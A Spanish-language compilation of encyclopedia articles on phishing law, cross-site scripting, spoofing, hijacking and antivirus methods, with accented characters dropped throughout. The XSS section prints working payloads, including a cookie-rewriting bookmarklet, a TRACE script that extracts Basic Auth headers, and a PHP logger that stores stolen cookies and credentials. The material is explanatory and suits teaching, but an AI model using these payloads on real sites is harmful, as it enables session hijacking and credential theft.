El 26 de enero de 2004, la FTC (Federal Trade Commission, la Comisin Federal de Comercio) de Estados Unidos llev a juicio el primer caso contra un phisher sospechoso. El acusado, un adolescente de California, supuestamente cre y utiliz una pgina web con un diseo que aparentaba ser la pgina de America Online para poder robar nmeros de tarjetas de crdito.26 Tanto Europa como Brasil siguieron la prctica de los Estados Unidos, rastreando y arrestando a presuntos phishers. A finales de marzo de 2005, un hombre estonio de 24 aos fue arrestado utilizando una backdoor, a partir de que las vctimas visitaron su sitio web falso, en el que inclua un keylogger que le permita monitorear lo que los usuarios tecleaban.27 Del mismo modo, las autoridades arrestaron al denominado phisher kingpin, Valdir Paulo de Almeida, lder de una de las ms grandes redes de phishing que en dos aos haba robado entre $18 a $37 millones de dlares estadounidenses.28 En junio del 2005 las autoridades del Reino Unido arrestaron a dos hombres por la prctica del phishing,29 en un caso conectado a la denominada Operation Firewall del Servicio Secreto de los Estados Unidos, que buscaba sitios web notorios que practicaban el phishing.30 La compaa Microsoft tambin se ha unido al esfuerzo de combatir el phishing. El 31 de marzo del 2005, Microsoft llev a la Corte del Distrito de Washington 117 pleitos federales. En algunos de ellos se acus al denominado phisher "John Doe" por utilizar varios mtodos para obtener contraseas e informacin confidencial. Microsoft espera desenmascarar con estos casos a varios operadores de phishing de gran envergadura. En marzo del 2005 tambin se consider la asociacin entre Microsoft y el gobierno de Australia para educar sobre mejoras a la ley que permitiran combatir varios crmenes cibernticos, incluyendo el phishing.31
Diversos pases se han ocupado de los temas del fraude y las estafas a travs de Internet. Uno de ellos es ell Convenio de Cibercriminalidad de Budapest pero adems otros pases han dedicado esfuerzos legislativos para castigar estas acciones . Algunos pases ya han incluido el phishing como delito en sus legislaciones, mientras que en otros an estn trabajando en ello.
Argentina
En Argentina, el 19 de septiembre de 2011 fue presentado un proyecto para sancionar el Phishing 32 , bajo el N de Expediente S-2257/11, Proyecto de Ley para tipificar el Phishing
o Captacin Ilegtima de Datos en el Senado de la Nacin. Mediante este proyecto se busca combatir las diferentes tcnicas de obtencin ilegtima de informacin personal.
Estados Unidos
En los Estados Unidos, el senador Patrick Leahy introdujo el Ley Anti-Phishing de 2005 el 1 de marzo de 2005. Esta ley federal de anti-phishing estableca que aquellos criminales que crearan pginas web falsas o enviaran spam a cuentas de correo electrnico con la intencin de estafar a los usuarios podran recibir una multa de hasta $250,000 USD y penas de crcel por un trmino de hasta cinco aos.33 Algunos estados tienen leyes que tratan las prcticas fraudulentas o engaosas o el robo de identidad y que tambin podra aplicarse a los delitos de phishing. Aqu se puede encontrar los estados que actualmente castigan este tipo de delitos.
Cross-site scripting
(Redirigido desde XSS) Saltar a: navegacin, bsqueda
XSS, del ingls Cross-site scripting es un tipo de inseguridad informtica o agujero de seguridad tpico de las aplicaciones Web, que permite a una tercera parte inyectar en pginas web vistas por el usuario cdigo JavaScript o en otro lenguaje script similar (ej: VBScript), evitando medidas de control como la Poltica del mismo origen. Este tipo de vulnerabilidad se conoce en espaol con el nombre de Secuencias de comandos en sitios cruzados.1 Es posible encontrar una vulnerabilidad XSS en aplicaciones que tenga entre sus funciones presentar la informacin en un navegador web u otro contenedor de pginas web. Sin embargo, no se limita a sitios web disponibles en Internet, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en s. XSS es un vector de ataque que puede ser utilizado para robar informacin delicada, secuestrar sesiones de usuario, y comprometer el navegador, subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde los primeros das de la Web.2 Esta situacin es usualmente causada al no validar correctamente los datos de entrada que son usados en cierta aplicacin, o no sanear la salida adecuadamente para su presentacin como pgina web. Esta vulnerabilidad puede estar presente de las siguientes formas:
Directa (tambin llamada Persistente): este tipo de XSS comnmente filtrado, y consiste en embeber cdigo HTML peligroso en sitios que lo permitan; incluyendo as etiquetas como <script> o <iframe>. Indirecta (tambin llamada Reflejada): este tipo de XSS consiste en modificar valores que la aplicacin web utiliza para pasar variables entre dos pginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web, esto podra extenderse al DOM del navegador).
ndice
1 XSS Indirecto (reflejado) 2 XSS Directo (persistente) 3 AJAX 4 Enlaces externos 5 Notas y referencias
y que al acceder se crear un documento HTML enlazando con un frame a menu.asp. En este ejemplo, qu pasara si se pone como URL del frame un cdigo javascript?
javascript:while(1)alert("Este mensaje saldra indefinidamente");
Si este enlace lo pone un atacante hacia una vctima, un visitante podr verlo y ver que es del mismo dominio, suponiendo que no puede ser nada malo y de resultado tendr un bucle infinito de mensajes. Un atacante en realidad tratara de colocar un script que robe las cookies de la vctima, para despus poder personificarse como con su sesin, o hacer automtico el proceso con el uso de la biblioteca cURL o alguna similar. De esta forma, al recibir la cookie, el atacante podra ejecutar acciones con los permisos de la vctima sin siquiera necesitar su contrasea. Otro uso comn para estas vulnerabilidades es lograr hacer phishing. Quiere ello decir que la vctima ve en la barra de direcciones un sitio, pero realmente est en otra. La vctima introduce su contrasea y se la enva al atacante. Una pgina como la siguiente:
error.php?error=Usuario%20Invalido
es probablemente vulnerable a XSS indirecto, ya que si escribe en el documento "Usuario Invlido", esto significa que un atacante podra insertar HTML y JavaScript si as lo desea. Por ejemplo, un tag como <script> que ejecute cdigo javascript, cree otra sesin bajo otro usuario y mande la sesin actual al atacante. Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido de una cookie de forma sencilla, usando el siguiente script. Slo se debe colocar en la barra de direcciones, y presionar 'Enter'.
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_; });
Tambin se puede crear un DIV con background-image: url(javascript:eval(this.fu)) como estilo y aadir al DIV un campo llamado fu que contenga el cdigo a ejecutar, por ejemplo:
<div fu="alert('Hola mundo');" STYLE="background-image: url(javascript:eval(this.fu))">
AJAX
Usar AJAX para ataques de XSS no es tan conocido, pero s peligroso. Se basa en usar cualquier tipo de vulnerabilidad de XSS para introducir un objeto XMLHttp y usarlo para enviar contenido POST, GET, sin conocimiento del usuario.
Este se ha popularizado con gusanos de XSS que se encargan de replicarse por medio de vulnerabilidades de XSS persistentes (aunque la posibilidad de usar XSS reflejados es posible). El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticacin de un sistema basado en Autenticacin Bsica (Basic Auth). Slo falta decodificarlo, pero es ms fcil mandarlo codificado al registro de contraseas. La codificacin es base64. Script para obtener credenciales en tipo BASIC Esta tcnica tambin es llamada XST, Cross Site Tracing.
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); // para firefox, es: var xmlhttp = new XMLHttpRequest(); xmlhttp.open("TRACE","./",false); xmlhttp.send(null); str1=xmlhttp.responseText; splitString = str1.split("Authorization: Basic "); str2=splitString[1]; str3=str2.match(/.*/)[0]; alert(str3);
Por cuestiones de seguridad, Mozilla Firefox y el Internet Explorer 6.2+ no permiten usar el metodo TRACE. Y este cdigo guardara un log con las cookies que enviara el atacante.
<?php $archivo = fopen('log2.htm','a'); $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.htmlentities(base64_decode($usuario))); fwrite($archivo, '<br />Cookie: '.htmlentities($cookie).'<br />Pagina: '.htmlentities($re));
fwrite($archivo, '<br /> IP: ' .$ip. '<br /> Fecha y Hora: ' .$fecha. '</hr>'); fclose($archivo); ?>
Spoofing
Saltar a: navegacin, bsqueda
Spoofing, en trminos de seguridad de redes hace referencia al uso de tcnicas de suplantacin de identidad generalmente con usos maliciosos o de investigacin. Se pueden clasificar los ataques de spoofing, en funcin de la tecnologa utilizada. Entre ellos tenemos el IP spoofing (quizs el ms conocido), ARP spoofing, DNS spoofing, Web spoofing o email spoofing, aunque en general se puede englobar dentro de spoofing cualquier tecnologa de red susceptible de sufrir suplantaciones de identidad.
ndice
1 Tipos de Spoofing o 1.1 IP Spoofing o 1.2 ARP Spoofing o 1.3 DNS Spoofing o 1.4 Web Spoofing o 1.5 Mail Spoofing o 1.6 GPS Spoofing 2 Vase tambin 3 Referencias 4 Enlaces externos
Tipos de Spoofing
IP Spoofing
Suplantacin de IP. Consiste bsicamente en sustituir la direccin IP origen de un paquete TCP/IP por otra direccin IP a la cual se desea suplantar. Esto se consigue generalmente gracias a programas destinados a ello y puede ser usado para cualquier protocolo dentro de TCP/IP como ICMP, UDP o TCP. Hay que tener en cuenta que las respuestas del host que
reciba los paquetes alterados irn dirigidas a la IP falsificada. Por ejemplo si enviamos un ping (paquete icmp "echo request") suplantado, la respuesta ser recibida por el host al que pertenece la IP legalmente. Este tipo de spoofing unido al uso de peticiones broadcast a diferentes redes es usado en un tipo de ataque de flood conocido como ataque Smurf. Para poder realizar Suplantacin de IP en sesiones TCP, se debe tener en cuenta el comportamiento de dicho protocolo con el envo de paquetes SYN y ACK con su SYN especfico y teniendo en cuenta que el propietario real de la IP podra (si no se le impide de alguna manera) cortar la conexin en cualquier momento al recibir paquetes sin haberlos solicitado. Tambin hay que tener en cuenta que los enrutadores actuales no admiten el envo de paquetes con IP origen no perteneciente a una de las redes que administra (los paquetes suplantados no sobrepasarn el enrutador).
ARP Spoofing Artculo principal: ARP Spoofing.
Suplantacin de identidad por falsificacin de tabla ARP. Se trata de la construccin de tramas de solicitud y respuesta ARP modificadas con el objetivo de falsear la tabla ARP (relacin IP-MAC) de una vctima y forzarla a que enve los paquetes a un host atacante en lugar de hacerlo a su destino legtimo. El protocolo Ethernet trabaja mediante direcciones MAC, no mediante direcciones IP. ARP es el protocolo encargado de traducir direcciones IP a direcciones MAC para que la comunicacin pueda establecerse; para ello cuando un host quiere comunicarse con una IP emite una trama ARP-Request a la direccin de Broadcast pidiendo la MAC del host poseedor de la IP con la que desea comunicarse. El ordenador con la IP solicitada responde con un ARP-Reply indicando su MAC. Los enrutadores y los hosts guardan una tabla local con la relacin IP-MAC llamada tabla ARP. Dicha tabla ARP puede ser falseada por un ordenador atacante que emita tramas ARP-REPLY indicando su MAC como destino vlido para una IP especfica, como por ejemplo la de un enrutador, de esta manera la informacin dirigida al enrutador pasara por el ordenador atacante quien podr escanear dicha informacin y redirigirla si as lo desea. El protocolo ARP trabaja a nivel de enlace de datos de OSI, por lo que esta tcnica slo puede ser utilizada en redes LAN o en cualquier caso en la parte de la red que queda antes del primer enrutador. Una manera de protegerse de esta tcnica es mediante tablas ARP estticas (siempre que las IP de red sean fijas), lo cual puede ser difcil en redes grandes. Otras formas de protegerse incluyen el usar programas de deteccin de cambios de las tablas ARP (como Arpwatch) y el usar la seguridad de puerto de los switches para evitar cambios en las direcciones MAC.
DNS Spoofing
Suplantacin de identidad por nombre de dominio. Se trata del falseamiento de una relacin "Nombre de dominio-IP" ante una consulta de resolucin de nombre, es decir, resolver con una direccin IP falsa un cierto nombre DNS o viceversa. Esto se consigue falseando las entradas de la relacin Nombre de dominio-IP de un servidor DNS, mediante alguna
vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).
Web Spoofing
Suplantacin de una pgina web real (no confundir con phishing). Enruta la conexin de una vctima a travs de una pgina falsa hacia otras pginas WEB con el objetivo de obtener informacin de dicha vctima (pginas web vistas, informacin de formularios, contraseas etc.). La pgina web falsa acta a modo de proxy, solicitando la informacin requerida por la vctima a cada servidor original y saltndose incluso la proteccin SSL. El atacante puede modificar cualquier informacin desde y hacia cualquier servidor que la vctima visite. La vctima puede abrir la pgina web falsa mediante cualquier tipo de engao, incluso abriendo un simple enlace. El web spoofing es difcilmente detectable; quiz la mejor medida es algn plugin del navegador que muestre en todo momento la IP del servidor visitado: si la IP nunca cambia al visitar diferentes pginas WEB significar que probablemente estemos sufriendo este tipo de ataque. Este ataque se realiza mediante una implantacin de cdigo el cual nos robar la informacin. Usualmente se realizan pginas fantasmas en las cuales se inyectan estos cdigos para poder sacar informacin de las vctimas.
Mail Spoofing
Suplantacin en correo electrnico de la direccin de correo electrnico de otras personas o entidades. Esta tcnica es usada con asiduidad para el envo de mensajes de correo electrnico hoax como suplemento perfecto para el uso de suplantacin de identidad y para SPAM, es tan sencilla como el uso de un servidor SMTP configurado para tal fin. Para protegerse se debera comprobar la IP del remitente (para averiguar si realmente esa ip pertenece a la entidad que indica en el mensaje) y la direccin del servidor SMTP utilizado.
GPS Spoofing
Un ataque de GPS spoofing intenta engaar a un receptor de GPS transmitiendo una seal ligeramente ms poderosa que la recibida desde los satlites del sistema GPS, estructurada para parecerse a un conjunto normal de seales GPS. Sin embargo estas seales estn modificadas de tal forma de que causarn que el receptor determine una posicin diferente a la real, especficamente algn lugar determinado por la seal atacante. Debido a que el sistema GPS trabaja midiendo el tiempo que le toma a una seal el viajar entre el satlite y el receptor, un spooging exitoso requiere que el atacante conozca con precisin donde se encuentra el blanco de tal forma que la seal falsa pueda ser estructurada con el retraso apropiado. Un ataque de GPS spoofing comienza con la transmisin de una seal ligeramente ms poderosa que la que entrega la posicin correcta, y luego se comienza a desviar lentamente hacia la posicin deseada por el atacante, ya que si esto se hace demasiado rpido el receptor atacado perder la fijacin en la seal, en cuyo momento el ataque de spoofing
slo funcionara como un ataque de perturbacin. Se ha sugerido que la captura de un Lockheed RQ-170 en el noreste de Irn en diciembre de 2011, fue el resultado de un ataque de este tipo.1 GPS spoofing attacks had been predicted and discussed in the GPS community previously, but no known example of a malicious spoofing attack has yet been confirmed.2 3 4
Hijacking
Saltar a: navegacin, bsqueda
Hijacking significa "secuestro" en ingls y en el mbito informtico hace referencia a toda tcnica ilegal que lleve consigo el aduearse o robar algo (generalmente informacin) por parte de un atacante. Es por tanto un concepto muy abierto y que puede aplicarse a varios mbitos, de esta manera podemos encontramos con el secuestro de conexiones de red, sesiones de terminal, servicios, modems y un largo etctera en cuanto a servicios informticos se refiere.
IP hijakers: secuestro de una conexin TCP/IP por ejemplo durante una sesin Telnet permitiendo a un atacante inyectar comandos o realizar un DoS durante dicha sesin. Page hijacking: secuestro de pgina web. Hace referencia a las modificaciones que un atacante realiza sobre una pgina web, normalmente haciendo uso de algn bug de seguridad del servidor o de programacin del sitio web, tambin es conocido como defacement o desfiguracin. Reverse domain hijacking o Domain hijacking: secuestro de dominio Session hijacking: secuestro de sesin Browser hijacking: (Secuestro de navegadores en espaol). Se llama as al efecto de apropiacin que realizan algunos spyware sobre el navegador web lanzando popups, modificando la pgina de inicio, modificando la pgina de bsqueda predeterminada etc. Es utilizado por un tipo de software malware el cual altera la configuracin interna de los navegadores de internet de un ordenador. El termino "secuestro" hace referencia a que stas modificaciones se hacen sin el permiso y el conocimiento del usuario. Algunos de stos son fciles de eliminar del sistema, mientras que otros son extremadamente complicados de eliminar y revertir sus cambios. Home Page Browser hijacking: secuestro de la pgina de inicio del navegador. Esto sucede cuando la pgina de inicio, en la que navegamos es cambiada por otra a inters del secuestrador. Generalmente son pginas en las que nos invita a usar los servicios de la pgina para que nuestro equipo est seguro y funcione correctamente. No cabe decir que es a cambio de un pago y que el origen del error y mal funcionamiento del equipo es debido a nuestro secuestrador Modem hijacking: secuestro del Modem. Esta expresin es en ocasiones utilizada para referirse a la estafa de los famosos dialers que tanta guerra dieron en su da (antes del
auge del ADSL) y que configuran sin el consentimiento del usuario nuevas conexiones a nmeros de cobro extraordinario. Thread hijacking: secuestro de un "tema" dentro de un foro de discusin de internet. Este termino hace referencia a la situacin que ocurre cuando dentro de un tema de discusin en un foro alguien intenta dirigir el hilo de la conversacin hacia asuntos que no tienen nada que ver con el tema inicial. Esto puede realizarse de manera intencionada para irritar al autor del tema o bien producirse de manera natural y no intencionada generalmente por usuarios sin mucho conocimiento en el asunto a tratar o que desconocen la dinmica de comportamiento de los foros. Usualmente en los tablones de imgenes se suelen descarrilar los hilos posteando capturas de Spiderman de los 60 con textos cmicos aadidos a estas.
Antivirus
Saltar a: navegacin, bsqueda En este artculo se detectaron los siguientes problemas:
No tiene una redaccin neutral. Carece de fuentes o referencias que aparezcan en una fuente acreditada.
Por favor, edtalo para mejorarlo, o debate en la discusin acerca de estos problemas.
Estas deficiencias fueron encontradas el 30 de diciembre de 2011.
No debe confundirse con Antiviral. Para un listado de programas antivirus, vase Anexo:Software antivirus.
En informtica los antivirus son programas cuyo objetivo es detectar y/o eliminar virus informticos. Nacieron durante la dcada de 1980. Con el transcurso del tiempo, la aparicin de sistemas operativos ms avanzados e Internet, ha hecho que los antivirus hayan evolucionado hacia programas ms avanzados que no slo buscan detectar virus informticos, sino bloquearlos, desinfectarlos y prevenir una infeccin de los mismos, y actualmente ya son capaces de reconocer otros tipos de malware, como spyware, rootkits, etc.
ndice
2.2 Copias de seguridad (pasivo) 3 Planificacin o 3.1 Consideraciones de software o 3.2 Consideraciones de la red o 3.3 Formacin: Del usuario o 3.4 Antivirus o 3.5 Firewalls o 3.6 Reemplazo de software o 3.7 Centralizacin y backup o 3.8 Empleo de sistemas operativos ms seguros o 3.9 Temas acerca de la seguridad 4 Sistemas operativos ms atacados o 4.1 Plataformas Unix, inmunes a los virus de Windows 5 Vase tambin 6 Referencias 7 Enlaces externos
Mtodos de contagio
Existen dos grandes grupos de propagacin: los virus cuya instalacin el usuario en un momento dado ejecuta o acepta de forma inadvertida, o los gusanos, con los que el programa malicioso acta replicndose a travs de las redes. En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anmalos o no previstos. Dichos comportamientos son los que dan la traza del problema y tienen que permitir la recuperacin del mismo. Dentro de las contaminaciones ms frecuentes por interaccin del usuario estn las siguientes:
Mensajes que ejecutan automticamente programas (como el programa de correo que abre directamente un archivo adjunto). Ingeniera social, mensajes como: Ejecute este programa y gane un premio. Entrada de informacin en discos de otros usuarios infectados. Instalacin de software que pueda contener uno o varios programas maliciosos. Unidades extrables de almacenamiento (USB).
Tipos de vacunas
Slo deteccin: Son vacunas que slo actualizan archivos infectados sin embargo no pueden eliminarlos o desinfectarlos. Deteccin y desinfeccin: son vacunas que detectan archivos infectados y que pueden desinfectarlos. Deteccin y aborto de la accin: son vacunas que detectan archivos infectados y detienen las acciones que causa el virus. Comparacin por firmas: son vacunas que comparan las firmas de archivos sospechosos para saber si estn infectados. Comparacin de firmas de archivo: son vacunas que comparan las firmas de los atributos guardados en tu equipo. Por mtodos heursticos: son vacunas que usan mtodos heursticos para comparar archivos. Invocado por el usuario: son vacunas que se activan instantneamente con el usuario. Invocado por la actividad del sistema: son vacunas que se activan instantneamente por la actividad del sistema operativo.
Mantener una poltica de copias de seguridad garantiza la recuperacin de los datos y la respuesta cuando nada de lo anterior ha funcionado. Asimismo las empresas deberan disponer de un plan y detalle de todo el software instalado para tener un plan de contingencia en caso de problemas.
Planificacin
La planificacin consiste en tener preparado un plan de contingencia en caso de que una emergencia de virus se produzca, as como disponer al personal de la formacin adecuada para reducir al mximo las acciones que puedan presentar cualquier tipo de riesgo. Cada antivirus puede planear la defensa de una manera, es decir, un antivirus puede hacer un escaneado completo, rpido o de vulnerabilidad segn elija el usuario.
Consideraciones de software
El software es otro de los elementos clave en la parte de planificacin. Se debera tener en cuenta la siguiente lista de comprobaciones para tu seguridad:
1. Tener el software imprescindible para el funcionamiento de la actividad, nunca menos pero tampoco ms. Tener controlado al personal en cuanto a la instalacin de software es una medida que va implcita. Asimismo tener controlado el software asegura la calidad de la procedencia del mismo (no debera permitirse software pirata o sin garantas). En todo caso un inventario de software proporciona un mtodo correcto de asegurar la reinstalacin en caso de desastre. 2. Disponer del software de seguridad adecuado. Cada actividad, forma de trabajo y mtodos de conexin a Internet requieren una medida diferente de aproximacin al problema. En general, las soluciones domsticas, donde nicamente hay un equipo expuesto, no son las mismas que las soluciones empresariales. 3. Mtodos de instalacin rpidos. Para permitir la reinstalacin rpida en caso de contingencia. 4. Asegurar licencias. Determinados softwares imponen mtodos de instalacin de una vez, que dificultan la reinstalacin rpida de la red. Dichos programas no siempre tienen alternativas pero ha de buscarse con el fabricante mtodos rpidos de instalacin. 5. Buscar alternativas ms seguras. Existe software que es famoso por la cantidad de agujeros de seguridad que introduce. Es imprescindible conocer si se puede encontrar una alternativa que proporcione iguales funcionalidades pero permitiendo una seguridad extra. Consideraciones de la red
Disponer de una visin clara del funcionamiento de la red permite poner puntos de verificacin filtrado y deteccin ah donde la incidencia es ms claramente identificable. Sin perder de vista otros puntos de accin es conveniente:
1. Mantener al mximo el nmero de recursos de red en modo de slo lectura. De esta forma se impide que computadoras infectadas los propaguen. 2. Centralizar los datos. De forma que detectores de virus en modo batch puedan trabajar durante la noche. 3. Realizar filtrados de firewall de red. Eliminar los programas que comparten datos, como pueden ser los P2P; Mantener esta poltica de forma rigurosa, y con el consentimiento de la gerencia. 4. Reducir los permisos de los usuarios al mnimo, de modo que slo permitan el trabajo diario. 5. Controlar y monitorizar el acceso a Internet. Para poder detectar en fases de recuperacin cmo se ha introducido el virus, y as determinar los pasos a seguir.
Antivirus
Es conveniente disponer de una licencia activa de antivirus. Dicha licencia se emplear para la generacin de discos de recuperacin y emergencia. Sin embargo no se recomienda en una red el uso continuo de antivirus. El motivo radica en la cantidad de recursos que dichos programas obtienen del sistema, reduciendo el valor de las inversiones en hardware realizadas. Aunque si los recursos son suficientes, este extra de seguridad puede ser muy til. Sin embargo los filtros de correos con detectores de virus son imprescindibles, ya que de esta forma se asegurar una reduccin importante de elecciones de usuarios no entrenados que pueden poner en riesgo la red. Los virus ms comunes son los troyanos y gusanos, los cuales ocultan tu informacin, creando Accesos Directos.
Firewalls Artculo principal: Cortafuegos (informtica).
Filtrar contenidos y puntos de acceso. Eliminar programas que no estn relacionados con la actividad. Tener monitorizado los accesos de los usuarios a la red, permite asimismo reducir la instalacin de software que no es necesario o que puede generar riesgo para la continuidad del negocio. Su significado es barrera de fuego y no permite que otra persona no autorizada tenga acceso desde otro equipo al tuyo.
Reemplazo de software
Los puntos de entrada en la red la mayora de las veces son el correo, las pginas WEB, y la entrada de ficheros desde discos, o de computadoras que no estn en la empresa (porttiles...) Muchas de estas computadoras emplean programas que pueden ser reemplazados por alternativas ms seguras. Es conveniente llevar un seguimiento de cmo distribuyen bancos, y externos el software, valorar su utilidad.
Centralizacin y backup
La centralizacin de recursos y garantizar el backup de los datos es otra de las pautas fundamentales en la poltica de seguridad recomendada. La generacin de inventarios de software, centralizacin del mismo y la capacidad de generar instalaciones rpidas proporcionan mtodos adicionales de seguridad.
Es importante tener localizado donde tenemos localizada la informacin en la empresa. De esta forma podemos realizar las copias de seguridad de forma adecuada. Control o separacin de la informtica mvil, dado que esta est ms expuesta a las contingencias de virus.
Empleo de sistemas operativos ms seguros
Para servir ficheros no es conveniente disponer de los mismos sistemas operativos que se emplean dentro de las estaciones de trabajo, ya que toda la red en este caso est expuesta a los mismos retos. Una forma de prevenir problemas es disponer de sistemas operativos con arquitecturas diferentes, que permitan garantizar la continuidad de negocio.
Temas acerca de la seguridad
Existen ideas instaladas por parte de las empresas de antivirus parte en la cultura popular que no ayudan a mantener la seguridad de los sistemas de informacin.
Mi sistema no es importante para un cracker. Este tema se basa en la idea de que no introducir passwords seguras en una empresa no entraa riesgos pues Quin va a querer obtener informacin ma? Sin embargo dado que los mtodos de contagio se realizan por medio de programas automticos, desde unas mquinas a otras, estos no distinguen buenos de malos, interesantes de no interesantes... Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a los virus. Estoy protegido pues no abro archivos que no conozco. Esto es falso, pues existen mltiples formas de contagio, adems los programas realizan acciones sin la supervisin del usuario poniendo en riesgo los sistemas. Como tengo antivirus estoy protegido. nicamente estoy protegido mientras el antivirus sepa a lo que se enfrenta y como combatirlo. En general los programas antivirus no son capaces de detectar todas las posibles formas de contagio existentes, ni las nuevas que pudieran aparecer conforme las computadoras aumenten las capacidades de comunicacin. Como dispongo de un firewall no me contagio. Esto nicamente proporciona una limitada capacidad de respuesta. Las formas de infectarse en una red son mltiples. Unas provienen directamente de accesos a mi sistema (de lo que protege un firewall) y otras de conexiones que realiz (de las que no me protege). Emplear usuarios con altos privilegios para realizar conexiones tampoco ayuda. Tengo un servidor web cuyo sistema operativo es un UNIX actualizado a la fecha. Puede que este protegido contra ataques directamente hacia el ncleo, pero si alguna de las aplicaciones web (PHP, Perl, Cpanel, etc.) est desactualizada, un ataque sobre algn script de dicha aplicacin puede permitir que el atacante abra una shell y por ende ejecutar comandos en el UNIX.
Heurstica en antivirus
(Redirigido desde Heurstica (antivirus)) Saltar a: navegacin, bsqueda
En los productos antivirus se conoce como heurstica a las tcnicas que emplean para reconocer cdigos maliciosos (virus, gusanos, troyanos, etc.) que no se encuentren en su base de datos (ya sea porque son nuevos, o por no ser muy divulgados). El trmino general implica funcionalidades como deteccin a travs de firmas genricas, reconocimiento del cdigo compilado, desensamblado, desempaquetamiento, entre otros. Su importancia radica en el hecho de ser la nica defensa automtica posible frente a la aparicin de nuevos cdigos maliciosos de los que no se posea firmas.
ndice
1 Tcnicas heursticas 2 Lgica Proposicional o 2.1 Firmas genricas 2.1.1 Desensamblado o 2.2 Desempaquetamiento 3 Evaluaciones retrospectivas o 3.1 Qu son las evaluaciones retrospectivas? o 3.2 Ejemplos
Hay muchos cdigos maliciosos que son modificados por sus autores para crear nuevas versiones. Usualmente, estas variantes contienen similitudes con los originales, por lo que se catalogan como una familia de virus. Gracias a las similitudes dentro del cdigo del virus, los antivirus pueden llegar a reconocer a todos los miembros de la misma familia a travs de una nica firma o vacuna genrica. Esto permite que al momento de aparecer una nueva versin de un virus ya conocido, aquellos antivirus que implementan esta tcnica puedan detectarlo sin la necesidad de una actualizacin. Las implementaciones de heurstica de algunos antivirus utilizan tcnicas para reconocer instrucciones comnmente aplicadas por los cdigos maliciosos, y as poder identificar si un archivo ejecutable puede llegar a ser un cdigo malicioso. Desensamblado Todo archivo ejecutable puede ser desensamblado con el objetivo de obtener el cdigo fuente del programa en lenguaje ensamblador. La heurstica de algunos antivirus es capaz de analizar el cdigo fuente de los programas sospechosos. De esta forma puede reconocer un posible cdigo malicioso si encuentra tcnicas de desarrollo que suelen usarse para programar virus, sin la necesidad de una actualizacin.
Desempaquetamiento
Los programadores de cdigos maliciosos suelen usar empaquetadores de archivos ejecutables como UPX con el fin de modificar la "apariencia" del virus a los ojos del anlisis antivirus. Para evitar ser engaados por un cdigo malicioso antiguo y luego reempaquetado, los antivirus incluyen en sus tcnicas heursticas mtodos de desempaquetamiento. De esta forma pueden analizar el cdigo real del programa, y no el empaquetado..
Evaluaciones retrospectivas
La heurstica es un aspecto muy difcil de probar en los antivirus, dado que se requiere realizar las denominadas evaluaciones retrospectivas.
Qu son las evaluaciones retrospectivas?
Para poder analizar correctamente el funcionamiento de las capacidades heursticas o proactivas de un antivirus, lo que se hace es detener la actualizacin de firmas del producto durante un perodo X. En ese lapso, se acumulan muestras de cdigos maliciosos nuevos, para que una vez recolectada una cantidad suficiente, se analice si los antivirus las
reconocen o no. Al no haber sido actualizados para detectar esas muestras, el antivirus solo podr reconocer si estn infectadas o no a travs de sus capacidades heursticas. Gracias a estas evaluaciones se puede conocer en detalle el rendimiento de los productos antivirus frente a virus nuevos o desconocidos..